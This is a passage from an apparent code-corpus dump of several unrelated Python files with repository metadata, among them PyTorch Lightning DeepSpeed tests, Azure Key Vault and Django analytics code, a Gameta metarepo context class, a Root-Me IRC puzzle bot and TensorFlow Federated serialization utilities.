default_root_dir=tmpdir,
plugins=[DeepSpeedPlugin(logging_batch_size_per_gpu=32)],
gpus=1,
fast_dev_run=True,
)
trainer.fit(model, datamodule=TestSetupIsCalledDataModule())
trainer.test(model)
@mock.patch("torch.optim.lr_scheduler.StepLR.step", autospec=True)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_scheduler_step_count(mock_step):
"""Test to ensure that the scheduler is called the correct amount of times during training when scheduler is
set to step."""
_run_scheduler_test(mock_step, max_epoch=2, limit_train_batches=2, interval="step")
@mock.patch("torch.optim.lr_scheduler.StepLR.step", autospec=True)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_scheduler_step_count_epoch(mock_step):
"""Test to ensure that the scheduler is called the correct amount of times during training when scheduler is
set to epoch."""
_run_scheduler_test(mock_step, max_epoch=2, limit_train_batches=2, interval="epoch")
def _run_scheduler_test(mock_step, max_epoch, limit_train_batches, interval):
class TestModel(BoringModel):
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.1)
return {
"optimizer": optimizer,
"lr_scheduler": {"scheduler": scheduler, "interval": interval},
}
model = TestModel()
trainer = Trainer(
default_root_dir=os.getcwd(),
limit_train_batches=limit_train_batches,
limit_val_batches=0,
max_epochs=max_epoch,
gpus=1,
plugins="deepspeed",
)
trainer.fit(model)
if interval == "epoch":
# assert called once at init and once during training
assert mock_step.call_count == 1 + max_epoch
else:
# assert called once at init and once during training
assert mock_step.call_count == 1 + (max_epoch * limit_train_batches)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_configure_gradient_clipping(tmpdir):
"""Test to ensure that a warning is raised when `LightningModule.configure_gradient_clipping` is overridden in
case of deepspeed."""
class TestModel(BoringModel):
def configure_gradient_clipping(self, optimizer, optimizer_idx, gradient_clip_val, gradient_clip_algorithm):
if optimizer_idx == 0:
self.clip_gradients(optimizer, gradient_clip_val, gradient_clip_algorithm)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
gpus=1,
plugins="deepspeed",
fast_dev_run=True,
)
with pytest.warns(UserWarning, match="handles gradient clipping internally"):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_gradient_clip_by_value(tmpdir):
"""Test to ensure that an exception is raised when using `gradient_clip_algorithm='value'`."""
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir,
gpus=1,
plugins="deepspeed",
gradient_clip_algorithm="value",
)
with pytest.raises(MisconfigurationException, match="does not support clipping gradients by value"):
trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_different_accumulate_grad_batches_fails(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, accumulate_grad_batches={1: 2}, gpus=1, plugins="deepspeed")
with pytest.raises(
MisconfigurationException, match="DeepSpeed currently does not support different `accumulate_grad_batches`"
):
trainer.fit(model)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_specific_gpu_device_id(tmpdir):
class TestCallback(Callback):
def on_train_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
assert model.device.index == 1
def on_train_batch_start(
self,
trainer: Trainer,
pl_module: LightningModule,
batch: Any,
batch_idx: int,
dataloader_idx: int,
) -> None:
assert batch.device.index == 1
def on_test_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
assert model.device.index == 1
def on_test_batch_start(
self,
trainer: Trainer,
pl_module: LightningModule,
batch: Any,
batch_idx: int,
dataloader_idx: int,
) -> None:
assert batch.device.index == 1
model = BoringModel()
trainer = Trainer(
default_root_dir=tmpdir, fast_dev_run=True, gpus=[1], plugins="deepspeed", callbacks=TestCallback()
)
trainer.fit(model)
trainer.test(model)
| 38.966507 | 119 | 0.709062 |
b906bc2944db7a236c31ae9afc9c7dd21fcf60f9 | 300 | py | Python | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 28 | 2018-04-28T19:18:06.000Z | 2021-12-01T00:19:30.000Z | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 10 | 2017-06-30T19:33:20.000Z | 2021-07-27T22:39:52.000Z | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 7 | 2018-10-21T17:39:55.000Z | 2021-02-14T01:55:18.000Z | import nexradaws
import tempfile
import six
templocation = tempfile.mkdtemp()
conn = nexradaws.NexradAwsInterface()
scans = conn.get_avail_scans('2013', '05', '31', 'KTLX')
localfiles = conn.download(scans[0:12],templocation)
six.print_(localfiles.success)
six.print_(localfiles.success[0].filepath) | 30 | 56 | 0.783333 |
0361f75985c48303043c2b7bda78b13b9059c359 | 2,031 | py | Python | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | 1 | 2018-07-23T08:59:24.000Z | 2018-07-23T08:59:24.000Z | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | null | null | null | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeyProperties(Model):
"""Properties of the key pair backing a certificate.
:param exportable: Indicates if the private key can be exported.
:type exportable: bool
:param key_type: The type of key pair to be used for the certificate.
Possible values include: 'EC', 'EC-HSM', 'RSA', 'RSA-HSM', 'oct'
:type key_type: str or ~azure.keyvault.models.JsonWebKeyType
:param key_size: The key size in bits. For example: 2048, 3072, or 4096
for RSA.
:type key_size: int
:param reuse_key: Indicates if the same key pair will be used on
certificate renewal.
:type reuse_key: bool
:param curve: Elliptic curve name. For valid values, see
JsonWebKeyCurveName. Possible values include: 'P-256', 'P-384', 'P-521',
'P-256K'
:type curve: str or ~azure.keyvault.models.JsonWebKeyCurveName
"""
_attribute_map = {
'exportable': {'key': 'exportable', 'type': 'bool'},
'key_type': {'key': 'kty', 'type': 'str'},
'key_size': {'key': 'key_size', 'type': 'int'},
'reuse_key': {'key': 'reuse_key', 'type': 'bool'},
'curve': {'key': 'crv', 'type': 'str'},
}
def __init__(self, *, exportable: bool=None, key_type=None, key_size: int=None, reuse_key: bool=None, curve=None, **kwargs) -> None:
super(KeyProperties, self).__init__(**kwargs)
self.exportable = exportable
self.key_type = key_type
self.key_size = key_size
self.reuse_key = reuse_key
self.curve = curve
| 40.62 | 136 | 0.611521 |
1eebe8b1cee2a982e6a82539bc84ee3411c6f952 | 2,372 | py | Python | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | """
Tests for the Google Analytics template tags and filters, using the new gtag.js library.
"""
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.template import Context
from django.test.utils import override_settings
from analytical.templatetags.google_analytics_gtag import GoogleAnalyticsGTagNode
from analytical.tests.utils import TagTestCase
from analytical.utils import AnalyticalException
@override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID='UA-123456-7')
class GoogleAnalyticsTagTestCase(TagTestCase):
"""
Tests for the ``google_analytics_js`` template tag.
"""
def test_tag(self):
r = self.render_tag('google_analytics_gtag', 'google_analytics_gtag')
self.assertTrue(
'<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123456-7"></script>'
in r, r)
self.assertTrue("gtag('js', new Date());" in r, r)
self.assertTrue("gtag('config', 'UA-123456-7');" in r, r)
def test_node(self):
r = GoogleAnalyticsGTagNode().render(Context())
self.assertTrue(
'<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123456-7"></script>'
in r, r)
self.assertTrue("gtag('js', new Date());" in r, r)
self.assertTrue("gtag('config', 'UA-123456-7');" in r, r)
@override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID=None)
def test_no_property_id(self):
self.assertRaises(AnalyticalException, GoogleAnalyticsGTagNode)
@override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID='wrong')
def test_wrong_property_id(self):
self.assertRaises(AnalyticalException, GoogleAnalyticsGTagNode)
@override_settings(ANALYTICAL_INTERNAL_IPS=['1.1.1.1'])
def test_render_internal_ip(self):
req = HttpRequest()
req.META['REMOTE_ADDR'] = '1.1.1.1'
context = Context({'request': req})
r = GoogleAnalyticsGTagNode().render(context)
self.assertTrue(r.startswith(
'<!-- Google Analytics disabled on internal IP address'), r)
self.assertTrue(r.endswith('-->'), r)
@override_settings(ANALYTICAL_AUTO_IDENTIFY=True)
def test_identify(self):
r = GoogleAnalyticsGTagNode().render(Context({'user': User(username='test')}))
self.assertTrue("gtag('set', {'user_id': 'test'});" in r, r)
| 40.20339 | 99 | 0.692243 |
4b0fdfdf5ebc0373b3fdaa7c04b3a86516f6af17 | 18,180 | py | Python | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 6 | 2020-11-09T17:06:14.000Z | 2021-05-12T09:09:57.000Z | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 33 | 2020-10-12T16:24:42.000Z | 2021-03-03T13:33:23.000Z | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 4 | 2020-11-04T06:35:49.000Z | 2021-01-13T15:56:38.000Z | import json
import shlex
from abc import abstractmethod
from contextlib import contextmanager
from copy import deepcopy
from os import getenv, getcwd, chdir, environ
from os.path import join, basename, normpath, abspath
from typing import Optional, List, Generator, Dict, Tuple, Union
import click
from jsonschema.validators import Draft7Validator
__all__ = [
# Contexts
'GametaContext', 'gameta_context',
]
SHELL = getenv('SHELL', '/bin/sh')
class File(object):
"""
Generic file interface for Gameta file formats
Attributes:
context (GametaContext): Reference to Gameta Context
file_name (str): Name of the reference file
"""
def __init__(self, context: 'GametaContext', file_name: str):
self.context = context
self.file_name = file_name
@property
def file(self) -> str:
"""
Returns the absolute path to the reference file
Returns:
str: Absolute path to the file
"""
return join(self.context.project_dir, self.file_name)
@abstractmethod
def load(self) -> None:
"""
Abstractmethod to load data and validate data from the file and populate the GametaContext
Returns:
None
"""
@abstractmethod
def export(self) -> None:
"""
Abstractmethod to export data from the GametaContext to the file
Returns:
None
"""
class GitIgnore(File):
"""
Interface for the .gitignore file
Attributes:
context (GametaContext): Reference to Gameta Context
file_name (str): Reference to the .gitignore file
"""
def __init__(self, context: 'GametaContext', file_name: str = '.gitignore'):
super(GitIgnore, self).__init__(context, file_name)
def load(self) -> None:
"""
Loads data from the .gitignore file and populates the GametaContext
Returns:
None
"""
try:
with open(self.file, 'r') as f:
self.context.gitignore_data = f.readlines()
except FileNotFoundError:
return
except Exception as e:
self.context.gitignore_data = []
click.echo(f"Could not load {self.file_name} file due to: {e.__class__.__name__}.{str(e)}")
def export(self) -> None:
"""
Exports data from the GametaContext to the .gitignore file
Returns:
None
"""
try:
with open(self.file, 'w') as f:
f.writelines(self.context.gitignore_data)
except Exception as e:
click.echo(f"Could not export data to {self.file_name} file: {e.__class__.__name__}.{str(e)}")
class Meta(File):
"""
Interface for the .meta file
Attributes:
context (GametaContext): Reference to Gameta Context
file_name (str): Reference to the .meta file
"""
def __init__(self, context: 'GametaContext', file_name: str = '.meta'):
super(Meta, self).__init__(context, file_name)
def load(self) -> None:
"""
Loads data from the .meta file, validates it and populates the GametaContext
Returns:
None
"""
# Attempt to load .meta file
try:
with open(self.file_name, 'r') as f:
self.context.gameta_data = json.load(f)
except FileNotFoundError:
return
except Exception as e:
click.echo(f"Could not load {self.file_name} file due to: {e.__class__.__name__}.{str(e)}")
# Validate repositories
try:
for repo in self.context.gameta_data['projects'].values():
self.context.validators['repositories'].validate(repo)
self.context.repositories = self.context.gameta_data['projects']
self.context.is_metarepo = True
self.context.generate_tags()
except Exception as e:
self.context.repositories = {}
self.context.tags = {}
click.echo(f"Malformed repository element, error: {e.__class__.__name__}.{str(e)}")
# Validate commands
try:
for command in self.context.gameta_data.get('commands', {}).values():
self.context.validators['commands'].validate(command)
self.context.commands = self.context.gameta_data.get('commands', {})
except Exception as e:
self.context.commands = {}
click.echo(f"Malformed commands element, error: {e.__class__.__name__}.{str(e)}")
# Validate constants
try:
self.context.validators['constants'].validate(self.context.gameta_data.get('constants', {}))
self.context.constants = self.context.gameta_data.get('constants', {})
except Exception as e:
self.context.constants = {}
click.echo(f"Malformed constants element, error: {e.__class__.__name__}.{str(e)}")
def export(self) -> None:
"""
Exports data from the GametaContext to the .meta file
Returns:
None
"""
try:
self.context.gameta_data['projects'] = self.context.repositories
if self.context.commands:
self.context.gameta_data['commands'] = self.context.commands
if self.context.constants:
self.context.gameta_data['constants'] = self.context.constants
with open(self.file, 'w') as f:
json.dump(self.context.gameta_data, f, indent=2)
except Exception as e:
click.echo(f"Could not export data to {self.file_name} file: {e.__class__.__name__}.{str(e)}")
class GametaContext(object):
"""
GametaContext for the current Gameta session
Attributes:
__schema__ (Dict): JSON Schema for Gameta .meta file
validators (Dict[str, jsonschema.Draft7Validator]): JSON Schema validators for each object component
reserved_params (Dict[str, List[str]): Reserved parameters for each object group
project_dir (Optional[str]): Project directory
is_metarepo (bool): Project is a metarepo
gameta_data (Dict): Gameta data extracted and exported
repositories (Dict[str, Dict]): Data of all the repositories contained in the metarepo
tags (Dict[str, List[str]]): Repository data organised according to tags
constants (Dict[str, Union[str, int, bool, float]]): Gameta constants data extracted
commands (Dict): Gameta commands data extracted
gitignore_data (List[str]): Gitignore data extracted from the .gitignore file
env_vars (Dict): Extracted environment variables with keys prefixed with $
files (Dict[str, File]): File formats supported
"""
__schema__: Dict = {
'$schema': "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"repositories": {
"$ref": "#/definitions/repositories"
},
"commands": {
"$ref": "#/definitions/commands"
},
"constants": {
"$ref": "#/definitions/constants"
},
"required": [
"repositories"
]
},
'definitions': {
"repositories": {
"type": "object",
"properties": {
"url": {
"type": ["string", "null"],
"format": "uri"
},
"path": {
"type": "string"
},
"tags": {
"type": "array",
"items": {
"type": "string"
}
},
"__metarepo__": {
"type": "boolean"
}
},
"required": [
"url", "path", "__metarepo__"
]
},
"commands": {
"type": "object",
"properties": {
"commands": {
"type": "array",
"items": {
"type": "string"
},
},
"description": {
"type": "string"
},
"raise_errors": {
"type": "boolean"
},
"shell": {
"type": "boolean"
},
"python": {
"type": "boolean"
},
"verbose": {
"type": "boolean"
},
"repositories": {
"type": "array",
"items": {
"type": "string"
},
},
"tags": {
"type": "array",
"items": {
"type": "string"
},
}
},
"minProperties": 6,
"maxProperties": 8,
"additionalProperties": False,
},
"constants": {
"type": "object",
"propertyNames": {
"pattern": "^[$A-Z0-9_-]"
}
}
}
}
validators = {
'meta': Draft7Validator(__schema__),
'repositories': Draft7Validator(__schema__['definitions']['repositories']),
'commands': Draft7Validator(__schema__['definitions']['commands']),
'constants': Draft7Validator(__schema__['definitions']['constants'])
}
reserved_params: Dict[str, List[str]] = {
'repositories': list(__schema__['definitions']['repositories']['properties'].keys()),
'commands': list(__schema__['definitions']['commands']['properties'].keys())
}
def __init__(self):
self.project_dir: Optional[str] = None
self.gitignore_data: List[str] = []
self.is_metarepo: bool = False
self.gameta_data: Dict = {}
self.constants: Dict[str, Union[str, int, bool, float]] = {}
self.commands: Dict = {}
self.repositories: Dict[str, Dict] = {}
self.tags: Dict[str, List[str]] = {}
self.env_vars: Dict = {
'$' + k.upper(): v
for k, v in environ.items()
}
self.files: Dict[str, File] = {
'meta': Meta(self),
'gitignore': GitIgnore(self)
}
@property
def project_name(self) -> str:
"""
Returns the name of the project
Returns:
str: Name of the project
"""
return basename(self.project_dir)
@property
def meta(self) -> str:
"""
Returns the path to the .meta file of the project, i.e. where it should be if the Project has not been
initialised
Returns:
str: Path to the project's .meta file
"""
return self.files['meta'].file
@property
def gitignore(self) -> str:
"""
Returns the path to the .gitignore file of the project, i.e. where it should be if the Project has not been
initialised
Returns:
str: Path to the project's .gitignore file
"""
return self.files['gitignore'].file
def add_gitignore(self, path: str) -> None:
"""
Adds the path to the gitignore_data
Args:
path (str): Path to be added
Returns:
None
"""
self.gitignore_data.append(path + '/\n')
def remove_gitignore(self, path: str) -> None:
"""
Removes the path from the gitignore_data
Args:
path (str): Path to be removed
Returns:
None
"""
try:
self.gitignore_data.remove(path + '/\n')
except ValueError:
return
def is_primary_metarepo(self, repo: str) -> bool:
"""
Returns a boolean if the repository is a primary meta-repository
Args:
repo (str): Repository to check
Returns:
bool: Flag to indicate if repository is a primary meta-repository
"""
return abspath(self.repositories[repo]["path"]) == self.project_dir
def load(self) -> None:
"""
Loads data from all supported file formats
Returns:
None
"""
for file, interface in self.files.items():
interface.load()
def export(self) -> None:
"""
Exports data to all supported file formats
Returns:
None
"""
for file, interface in self.files.items():
interface.export()
def generate_tags(self) -> None:
"""
Updates the tag indexes of the repositories
Returns:
None
"""
for repo, details in self.repositories.items():
for tag in details.get('tags', []):
if tag in self.tags:
self.tags[tag].append(repo)
else:
self.tags[tag] = [repo]
def apply(
self,
commands: List[str],
repos: List[str] = (),
shell: bool = False,
python: bool = False,
) -> Generator[Tuple[str, str], None, None]:
"""
Yields a list of commands to all repositories or a selected set of them, substitutes relevant parameters stored
in .meta file
Args:
commands (List[str]): Commands to be applied
repos (List[str]): Selected set of repositories
shell (bool): Flag to indicate if a separate shell should be used
python (bool): Flag to indicate if commands are to be tokenised as Python commands
Returns:
None
"""
repositories: List[Tuple[str, Dict[str, str]]] = \
[(repo, details) for repo, details in self.repositories.items() if repo in repos] or \
list(self.repositories.items())
for repo, details in repositories:
# Generate complete set of parameters for substitution
with self.cd(details['path']):
repo_commands: List[str] = [
c.format(**self.generate_parameters(repo, details, python)) for c in deepcopy(commands)
]
if python:
command: List[str] = self.python(repo_commands)
elif shell:
command: List[str] = self.shell(repo_commands)
else:
command: List[str] = self.tokenise(' && '.join(repo_commands))
yield repo, command
def generate_parameters(self, repo: str, repo_details: Dict, python: bool = False) -> Dict:
"""
Generates the set of parameters for each repository to be substituted into command strings.
Args:
repo (str): Repository name of parameters to be generated
repo_details (Dict): Repository details from .meta file
python (bool): Flag to indicate if Python variables should be generated, defaults to False
Returns:
Dict: Generated set of parameters
"""
combined_details: Dict = {
k: v.format(**self.env_vars) if isinstance(v, str) else v
for k, v in deepcopy(repo_details).items()
}
if python:
repositories: Dict = deepcopy(self.repositories)
repositories[repo] = deepcopy(combined_details)
combined_details.update(
{
'__repos__':
json.dumps(repositories)
.replace("true", "True")
.replace("false", "False")
.replace("null", "None")
}
)
combined_details.update(self.constants)
combined_details.update(self.env_vars)
return combined_details
@staticmethod
def tokenise(command: str) -> List[str]:
"""
Tokenises the commands into a form that is readily acceptable by subprocess
Args:
command (str): Constructed commands to be tokenised
Returns:
List[str]: Tokenised commands
"""
return shlex.split(command)
@contextmanager
def cd(self, sub_directory: str) -> Generator[str, None, None]:
"""
Changes directory to a subdirectory within the project
Args:
sub_directory (str): Relative subdirectory within the project
Returns:
Generator[str, None, None]: Path to current directory
"""
cwd = getcwd()
path = normpath(join(self.project_dir, sub_directory.lstrip('/')))
chdir(path)
yield path
chdir(cwd)
def shell(self, commands: List[str]) -> List[str]:
"""
Prepares commands to be executed in a separate shell as subprocess does not natively handle piping
Args:
commands (List[str]): User-defined commands
Returns:
List[str]: Shell command string to be executed by subprocess
"""
return self.tokenise(
f'{SHELL} -c "' +
' && '.join(commands) +
'"'
)
def python(self, commands: List[str]) -> List[str]:
"""
Prepares commands to be executed by Python interpreter via shell
Args:
commands List[str]: Python scripts
Returns:
List[str]: Python prepared commands to be executed by subprocess
"""
return self.shell(
["python3 -c \'{}\'".format(command.replace('"', '\\\"')) for command in commands]
)
gameta_context = click.make_pass_decorator(GametaContext, ensure=True)
| 32.063492 | 119 | 0.525468 |
08eaa9970f08b13d7e355b4588231a01a56ba862 | 1,324 | py | Python | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | programming/back_to_school.py | sptoom/root-me | b55536d4572d048b0a22932bb447d6bd69e6fad9 | [
"MIT"
] | null | null | null | import socket, string, time, thread, math
SERVER = 'irc.root-me.org'
PORT = 6667
NICKNAME = 'sptoom'
CHANNEL = '#root-me_challenge'
BOTNAME = 'Candy'
def irc_connect():
global IRC
IRC = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
IRC.connect((SERVER, PORT))
def irc_command(command):
print(command)
IRC.send(command + '\n')
irc_connect()
irc_command("USER %s %s %s : Hey" % (NICKNAME, NICKNAME, NICKNAME))
irc_command("NICK %s" % NICKNAME)
irc_command("JOIN %s" % CHANNEL)
while (1):
text = IRC.recv(1024)
print(text)
if text.find('PING') != -1:
# answer PING from IRC server
msg = text.split()
if msg[0] == "PING":
irc_command("PONG %s" % msg[1] + '\n')
elif text.find("%s +x" % NICKNAME) != -1:
# detect that IRC chat was fully initialized and send PRIVMSG to bot
irc_command("PRIVMSG %s : !ep1" % BOTNAME)
elif text.find(BOTNAME) != -1 and text.find("PRIVMSG %s" % NICKNAME) != -1:
# detect and parse bot answer
if text.find(' / ') != -1:
numbers = text.split(' / ')
print(numbers)
sqroot = math.sqrt(float(numbers[0].split(':')[2]))
result = sqroot * float(numbers[1].split('\r')[0])
irc_command("PRIVMSG %s : !ep1 -rep %f" % (BOTNAME, result))
| 30.090909 | 79 | 0.587613 |
7e96e67e3743b9534f1203df196ac379f3e509a9 | 2,872 | py | Python | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | src/utils/p4ast.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | 1 | 2022-02-12T08:45:28.000Z | 2022-02-12T08:45:28.000Z | # Copyright 2016 Eotvos Lorand University, Budapest, Hungary
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from p4_hlir.frontend.ast import *
################################################################################
def Integer(value): return P4Integer('', 42, value)
def FieldRefExpression(headerref, fieldname): return P4FieldRefExpression('', 42, headerref, str(fieldname))
def RefExpression(name): return P4RefExpression('', 42, str(name))
def ParserImmediateReturn(next_state): return P4ParserImmediateReturn('', 42, next_state)
def ParserSelectReturn(select, cases): return P4ParserSelectReturn('', 42, select, cases)
def ParserFunction(name, ops, ret): return P4ParserFunction('', 42, str(name), ops, ret)
def ParserSelectDefaultCase(next_state): return P4ParserSelectDefaultCase('', 42, next_state)
def ParserSelectCase(case, next_state): return P4ParserSelectCase('', 42, case, next_state)
def Table(name, action_spec, action_prof, reads, min_size, max_size, size, timeout): return P4Table('', 42, str(name), action_spec, action_prof, reads, min_size, max_size, size, timeout)
def ParserExtract(header): return P4ParserExtract('', 42, header)
def TableFieldMatch(field, typ): return P4TableFieldMatch('', 42, field, typ)
def ControlFunction(name, body): return P4ControlFunction('', 42, str(name), body)
def HeaderType(name, layout, length, max_length): return P4HeaderType('', 42, str(name), layout, length, max_length)
def HeaderInstanceRegular(header_type, name): return P4HeaderInstanceRegular('', 42, header_type, str(name))
def HeaderInstanceMetadata(header_type, name): return P4HeaderInstanceMetadata('', 42, header_type, str(name))
def ActionCall(action): return P4ActionCall('', 42, action)
def ActionCallWP(action, parameters): return P4ActionCall('', 42, action, parameters)
def ActionFunction(name, params, body): return P4ActionFunction('', 42, str(name), params, body)
def BinaryExpression(op, left, right): return P4BinaryExpression('', 42, str(op), left, right)
def ControlFunction(name, body): return P4ControlFunction('', 42, name, body)
def ControlFunctionApply(name): return P4ControlFunctionApply('', 42, name)
def ControlFunctionApplyAndSelect(name, cases): return P4ControlFunctionApplyAndSelect('', 42, name, cases)
def ControlFunctionApplyActionCase(case, next): return P4ControlFunctionApplyActionCase('', 42, case, next)
| 68.380952 | 186 | 0.753134 |
30f2c3546a836c380a75c6618d1fc0c71ec30774 | 12,722 | py | Python | tensorflow_federated/python/core/impl/executor_service_utils.py | VonRosenchild/federated | ad3986f8587a0f1dd0c6ce738db1fef436cb826f | [
"Apache-2.0"
] | 1 | 2019-10-10T06:19:52.000Z | 2019-10-10T06:19:52.000Z | tensorflow_federated/python/core/impl/executor_service_utils.py | wangcaihua/federated | c8c7fe84d20f6c16a2a9f290a05179b5422257b6 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/core/impl/executor_service_utils.py | wangcaihua/federated | c8c7fe84d20f6c16a2a9f290a05179b5422257b6 | [
"Apache-2.0"
] | 2 | 2019-10-10T06:19:41.000Z | 2021-01-28T03:06:55.000Z | # Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A set of utility methods for `executor_service.py` and its clients."""
import numpy as np
import tensorflow as tf
from google.protobuf import any_pb2
from tensorflow_federated.proto.v0 import computation_pb2
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import computation_impl
from tensorflow_federated.python.core.impl import tensorflow_serialization
from tensorflow_federated.python.core.impl import type_utils
from tensorflow_federated.python.core.impl.compiler import type_serialization
from tensorflow_federated.python.core.impl.utils import tensorflow_utils
def serialize_tensor_value(value, type_spec=None):
"""Serializes a tensor value into `executor_pb2.Value`.
Args:
value: A Numpy array or other object understood by `tf.make_tensor_proto`.
type_spec: An optional type spec, a `tff.TensorType` or something
convertible to it.
Returns:
A tuple `(value_proto, ret_type_spec)` in which `value_proto` is an instance
of `executor_pb2.Value` with the serialized content of `value`, and
`ret_type_spec` is the type of the serialized value. The `ret_type_spec` is
the same as the argument `type_spec` if that argument was not `None`. If
the argument was `None`, `ret_type_spec` is a type determined from `value`.
Raises:
TypeError: If the arguments are of the wrong types.
ValueError: If the value is malformed.
"""
if isinstance(value, tf.Tensor):
if type_spec is None:
type_spec = computation_types.TensorType(
dtype=tf.DType(value.dtype), shape=tf.TensorShape(value.shape))
value = value.numpy()
if type_spec is not None:
type_spec = computation_types.to_type(type_spec)
py_typecheck.check_type(type_spec, computation_types.TensorType)
if isinstance(value, np.ndarray):
tensor_proto = tf.make_tensor_proto(
value, dtype=type_spec.dtype, verify_shape=False)
type_utils.check_assignable_from(
type_spec,
computation_types.TensorType(
dtype=tf.DType(tensor_proto.dtype),
shape=tf.TensorShape(tensor_proto.tensor_shape)))
else:
tensor_proto = tf.make_tensor_proto(
value,
dtype=type_spec.dtype,
shape=type_spec.shape,
verify_shape=True)
else:
tensor_proto = tf.make_tensor_proto(value)
type_spec = computation_types.TensorType(
dtype=tf.DType(tensor_proto.dtype),
shape=tf.TensorShape(tensor_proto.tensor_shape))
any_pb = any_pb2.Any()
any_pb.Pack(tensor_proto)
return executor_pb2.Value(tensor=any_pb), type_spec
def deserialize_tensor_value(value_proto):
"""Deserializes a tensor value from `executor_pb2.Value`.
Args:
value_proto: An instance of `executor_pb2.Value`.
Returns:
A tuple `(value, type_spec)`, where `value` is a Numpy array that represents
the deserialized value, and `type_spec` is an instance of `tff.TensorType`
that represents its type.
Raises:
TypeError: If the arguments are of the wrong types.
ValueError: If the value is malformed.
"""
py_typecheck.check_type(value_proto, executor_pb2.Value)
which_value = value_proto.WhichOneof('value')
if which_value != 'tensor':
raise ValueError('Not a tensor value: {}'.format(which_value))
# TODO(b/134543154): Find some way of creating the `TensorProto` using a
# proper public interface rather than creating a dummy value that we will
# overwrite right away.
tensor_proto = tf.make_tensor_proto(values=0)
if not value_proto.tensor.Unpack(tensor_proto):
raise ValueError('Unable to unpack the received tensor value.')
tensor_value = tf.make_ndarray(tensor_proto)
value_type = computation_types.TensorType(
